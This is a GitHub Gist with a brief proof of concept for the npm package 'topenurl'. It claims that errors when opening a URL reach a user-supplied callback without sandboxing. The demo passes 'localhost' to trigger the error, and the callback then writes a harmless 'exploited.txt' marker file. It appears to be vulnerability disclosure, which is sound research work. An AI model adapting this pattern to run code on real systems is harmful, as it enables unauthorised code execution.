Created
October 26, 2023 12:01
-
-
Save mcoimbra/87e8866f9dc7334c7def35799d9ef7e1 to your computer and use it in GitHub Desktop.
Package topenurl: when executing the open(url, callback) function, if there is an error reading the URL, it gets handled by a user-provided callback function without any security measure like the node:vm module.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('topenurl'); | |
| const callback = function(error) { | |
| const fs = require('node:fs'); | |
| let fd = fs.openSync('exploited.txt', 'a'); | |
| fs.closeSync(fd); | |
| }; | |
| /* This 'url' value will throw an error, triggering a call to 'callback' | |
| * and creating a local 'exploited.txt' file. | |
| */ | |
| const url = 'localhost'; | |
| pkg.open(url, callback); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment